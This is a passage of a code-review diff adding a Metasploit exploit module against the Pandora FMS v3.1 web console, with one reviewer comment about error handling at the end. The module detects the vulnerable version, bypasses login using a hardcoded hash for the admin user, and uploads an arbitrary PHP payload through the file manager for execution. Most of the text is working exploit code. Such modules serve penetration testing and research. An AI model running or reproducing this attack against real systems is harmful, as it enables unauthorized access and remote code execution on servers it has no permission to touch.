modules/exploits/multi/http/pandora_upload_exec.rb

```diff
@@ -0,0 +1,173 @@
+        [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Nov 30 2010",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
+      ], self.class)
+  end
+
+  def check
+
+    base  = target_uri.path
+
+    # retrieve software version from login page
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(base, 'index.php')
+      })
+      if res and res.code == 200
+        #Tested on v3.1 Build PC100609 and PC100608
+        if res.body.include?("v3.1 Build PC10060")
+          return Exploit::CheckCode::Vulnerable
+        elsif res.body.include?("Pandora")
+          return Exploit::CheckCode::Detected
+        end
+      end
+      return Exploit::CheckCode::Safe
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} - Connection failed")
+    end
+    return Exploit::CheckCode::Unknown
+
+  end
+
+  # upload a payload using the pandora built-in file upload
+  def upload(base, file, cookies)
+
+    begin
+      data = Rex::MIME::Message.new
+      data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
+      data.add_part("Go", nil, nil, 'form-data; name="go"')
+      data.add_part("images", nil, nil, 'form-data; name="directory"')
+      data.add_part("1", nil, nil, 'form-data; name="upload_file"')
+      data_post = data.to_s
+      data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+      res = send_request_cgi({
+        'method'  => 'POST',
+        'uri'     => normalize_uri(base, 'index.php'),
+        'cookie'  => cookies,
+        'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+        'vars_get' => {
+          'sec'  => 'gsetup',
+          'sec2' => 'godmode/setup/file_manager',
+        },
+        'data'    => data_post
+      })
+
+      register_files_for_cleanup(@fname)
+      return res
+
+    rescue ::URI::InvalidURIError
+      fail_with(Exploit::Failure::Unknown, "Unable to get the uri correctly")
+    end
+
+  end
+
+  def exploit
+
+    base   = target_uri.path
+    @fname = "#{rand_text_numeric(7)}.php"
+    cookies = ""
+
+    # bypass authentication and get session cookie
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(base, 'index.php'),
+      'vars_get' => {
+        'loginhash_data'  => '21232f297a57a5a743894a0e4a801fc3',
+        'loginhash_user' => 'admin',
+        'loginhash' => '1',
+      },
+    })
+
+    # fix if logic
+    if res and res.code == 200
+      if res.body.include?("Logout")
+        cookies = res.headers['Set-Cookie']
+        cookies = res.get_cookies
+          print_status("Login Bypass Successful")
+          print_status("cookie monster = " + cookies)
+      else
+          print_error("Login Bypass Failed")
```

Comment:
This should probably be `fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")`